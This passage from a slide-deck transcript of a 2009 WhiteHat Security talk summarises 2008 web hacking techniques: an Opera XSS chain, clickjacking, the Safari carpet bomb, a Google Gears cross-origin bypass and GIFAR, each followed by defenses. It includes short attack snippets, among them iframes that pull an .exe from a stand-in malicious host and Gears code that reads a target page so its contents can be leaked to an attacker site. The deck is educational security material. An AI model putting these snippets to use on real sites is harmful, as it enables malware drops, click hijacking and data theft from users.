  • 28. Top Ten Web Hacking Techniques (2008) Defenses Website: Avoid saving sensitive data on the users machine and clear the client-side storage whenever possible. Web Browser: Web users should check regularly the content of the HTML5 client-side storage saved by their browser (delete?). LSO Storage Locations: Windows XP $userApplication DataMacromediaFlash Player#SharedObjects Windows Vista $userAppDataRoamingMacromediaFlash Player#SharedObjects Mac OS X ~/Library/Preferences/Macromedia/Flash Player/#SharedObjects Linux /home/$user/.macromedia/Flash_Player/#SharedObjects © 2009 WhiteHat, Inc. | Page 28
  • 29. Top Ten Web Hacking Techniques (2008) A Different Opera Exploit an XSS in opera:feature scheme leading to code execution by abusing same origin policy. By: Stefano Di Paola http://www.wisec.it/sectou.php?id=49102ef18b7f3 http://aviv.raffon.net/2008/10/30/ADifferentOpera.aspx http://seclists.org/fulldisclosure/2008/Oct/0401.html 5© 2009 WhiteHat, Inc. | Page 29
  • 30. Top Ten Web Hacking Techniques (2008) How it works 1) CSRF a user from evilhost to opera:historysearch • Pre-existing XSS in opera:historysearch leads to writing in opera:* context. SOP matching is evaluated by comparing        scheme1 + host1 + port1 == scheme2 + host2 + port2 opera:* considered as:        opera + null + null 2) Inject IFRAME to opera:config change the email client to arbitrary command 3) Open a window pointing to a quot;mailtoquot; scheme. © 2009 WhiteHat, Inc. | Page 30
  • 31. Top Ten Web Hacking Techniques (2008) Defenses Upgrade to Opera => 9.62 © 2009 WhiteHat, Inc. | Page 31
  • 32. Top Ten Web Hacking Techniques (2008) Clickjacking / Videojacking Think of any button – image, link, form, etc. – on any website – that can appear between the Web browser walls. This includes wire transfer on banks, DSL router buttons, Digg buttons, CPC advertising banners, Netflix queue. 4 Next consider that an attacker can invisibly hover these buttons below the user's mouse, so that when a user clicks on something they visually see, they're actually clicking on something the attacker wants them to. By: Jeremiah Grossman and Robert Hansen http://www.sectheory.com/clickjacking.htm http://jeremiahgrossman.blogspot.com/2008/10/clickjacking-web-pages-can-see-and-hear.html http://blogs.adobe.com/psirt/2008/10/clickjacking_security_advisory.html © 2009 WhiteHat, Inc. | Page 32
  • 33. Top Ten Web Hacking Techniques (2008) © 2009 WhiteHat, Inc. | Page 33
  • 34. Top Ten Web Hacking Techniques (2008) Hover Invisible IFRAMEs HTML, CSS, and JavaScript may size, follow the mouse and make transparent third-party IFRAME content. <iframe src=quot;http://victim/page.htmlquot; scrolling=quot;noquot; frameborder=quot;0quot; style=quot;opacity:.1;filter: alpha(opacity=.1); -moz-opacity:1.0;quot;> </iframe> © 2009 WhiteHat, Inc. | Page 34
  • 35. Top Ten Web Hacking Techniques (2008) What if a Web page could See and Hear you? Clickjacking enables corporate espionage, government surveillance, home user spying, etc. Every computer with a webcam and/or a microphone becomes a remote monitoring device. JavaScript can’t access the webcam or microphone... © 2009 WhiteHat, Inc. | Page 35
  • 36. Top Ten Web Hacking Techniques (2008) <div style=quot;opacity:.1;filter: alpha(opacity=.1); -moz-opacity:.9quot;> <embed src=quot;vid.swfquot; type=quot;application/x-shockwave-flashquot; allowfullscreen=quot;falsequot; wmode=quot;transparentquot;> </embed> </div> © 2009 WhiteHat, Inc. | Page 36
  • 37. Top Ten Web Hacking Techniques (2008) Defenses Frame-busting code <script> if (window.top !== window.self) { setTimeout(function() {document.body.innerHTML='';},1);window.self.onload=function(evt) {document.body.innerHTML='';};} </script> /* IE 8 Only */ X-FRAME-OPTIONS: (DENY | SAMEORIGIN) • Upgrade to Flash Player 10 • NoScript w/ ClearClick © 2009 WhiteHat, Inc. | Page 37
  • 38. Top Ten Web Hacking Techniques (2008) Safari Carpet Bomb The Safari Carpet Bomb attack allows a malicious website controlled by an attacker to litter the user's desktop on windows or the user's “Downloads” directory on OSX with arbitrary files and malware. This vulnerability has the distinction of bringing the term quot;blended threatquot; into the 3 security vernacular because, if you are able to litter user's machines with arbitrary files, you can further the impact and affect other applications that trust content on the local filesystem. By: Nitesh Dhanjani http://www.dhanjani.com/blog/2008/05/safari-carpet-b.html http://www.oreillynet.com/onlamp/blog/2008/05/safari_carpet_bomb.html http://aviv.raffon.net/2008/05/31/SafariPwnsInternetExplorer.aspx © 2009 WhiteHat, Inc. | Page 38
  • 39. Top Ten Web Hacking Techniques (2008) How it works When the Safari browser is served a file with a content-type that cannot be rendered by the browser, it automatically downloads it do the default download location (desktop on Windows, Downloads directory on OSX) without notifying or asking the user. This allows a malicious website to litter the user's Desktop or download directory with arbitrary files, including malware. <HTML> <iframe id=quot;framequot; src=quot;http://malicious.example.com/cgi-bin/carpet_bomb.exequot;></iframe> <iframe id=quot;framequot; src=quot;http://malicious.example.com/cgi-bin/carpet_bomb.exequot;></iframe> <iframe id=quot;framequot; src=quot;http://malicious.example.com/cgi-bin/carpet_bomb.exequot;></iframe> ... ... <iframe id=quot;framequot; src=quot;http://malicious.example.com/cgi-bin/carpet_bomb.exequot;></iframe> </HTML> © 2009 WhiteHat, Inc. | Page 39
  • 40. Top Ten Web Hacking Techniques (2008) © 2009 WhiteHat, Inc. | Page 40
  • 41. Top Ten Web Hacking Techniques (2008) Defenses Windows: Download the latest version of Safari OS X: Versions of Safari remain un-patched by Apple. © 2009 WhiteHat, Inc. | Page 41
  • 42. Top Ten Web Hacking Techniques (2008) Breaking Google Gears' Cross- Origin Communication Model Under some circumstances the cross-origin communication security model 2 of Google Gears could be bypassed. An attacker could gain access to sensitive resources of the victim in other websites (even those that does not use Google Gears) - mainly ones that contain users' content (forums, web- mails, social networks, office-like services, etc.). By: Yair Amit http://blog.watchfire.com/wfblog/2008/12/breaking-google-gears-cross-origin-communication-model.html © 2009 WhiteHat, Inc. | Page 42
  • 43. Top Ten Web Hacking Techniques (2008) Google Gears Workers var wp = google.gears.workerPool; wp.allowCrossOrigin(); wp.onmessage = function(a, b, message) { var request = google.gears.factory.create('beta.httprequest'); request.open('GET', 'http://TARGET.SITE/SENSITIVE_PAGE.htm'); request.onreadystatechange = function() { if (request.readyState == 4) { wp.sendMessage(quot;The response was: quot; + request.responseText, message.sender); } }; request.send(); } © 2009 WhiteHat, Inc. | Page 43
  • 44. Top Ten Web Hacking Techniques (2008) Attack Flow  1. Attacker creates a text file that contains (malicious) Google Gears commands (Accessing the DB, using the HttpRequest module, etc.). 2. Attacker finds a way to put the text content into a target domain (http:// TARGET.SITE/Upload/innocent.jpg). The Gears quot;workerquot; code does not contain suspicious characters (<,>, etc...), it is therefore less likely to be filtered by http:// TARGET.SITE's server-side logic. 3. Attacker creates http://ATTACKER.SITE/attack.html which contains some Google Gears code that loads and executes http://TARGET.SITE/Upload/innocent.jpg 4. The code embedded in innocent.jpg runs in the context of http://TARGET.SITE. It therefore has permissions to access Google Gears client-side objects such as the DB, the local server data or web resources (with the victim's credentials) using the HttpRequest module built into Google Gears. 5. All information collected in the previous phase can easily be leaked back to http:// ATTACKER.SITE using Google Gears' standard messaging mechanism. © 2009 WhiteHat, Inc. | Page 44
  • 45. Top Ten Web Hacking Techniques (2008) Defenses Update Google Gears. (Content-Type header value (application/x-gears-worker) Web developers who rely on Google Gears should be aware that the fix might require some changes, such as creating a special rule in the Web server for serving Google-Gears worker code files. © 2009 WhiteHat, Inc. | Page 45
  • 46. Top Ten Web Hacking Techniques (2008) © 2009 WhiteHat, Inc. | Page 46
  • 47. Top Ten Web Hacking Techniques (2008) GIFAR A content ownership issue taking advantage of flimsy security controls on both the server side and the client side. What's new is appending a Java Applet (in the form of a JAR) at the end of another file that would be commonly allowed in file uploads 1 on web applications, such as images, word documents, audio/video files, just about anything. By: Billy Rios, Nathan McFeters, Rob Carter, and John Heasman http://riosec.com/how-to-create-a-gifar http://xs-sniper.com/blog/2008/12/17/sun-fixes-gifars/ http://blogs.zdnet.com/security/?p=1619 © 2009 WhiteHat, Inc. | Page 47
  • 48. Top Ten Web Hacking Techniques (2008) How it works GIF JAR © 2009 WhiteHat, Inc. | Page 48
  • 49. Top Ten Web Hacking Techniques (2008) Defenses Website: Do not accept file uploads Host uploaded content on throw away domains or IP addresses Convert all content Web Browser: a) Disable third-party browser extensions b) Install the latest JVM and remove older versions © 2009 WhiteHat, Inc. | Page 49
  • 50. Thank You! Jeremiah Grossman Blog: http://jeremiahgrossman.blogspot.com/ Twitter: http://twitter.com/jeremiahg Email: jeremiah@whitehatsec.com WhiteHat Security http://www.whitehatsec.com/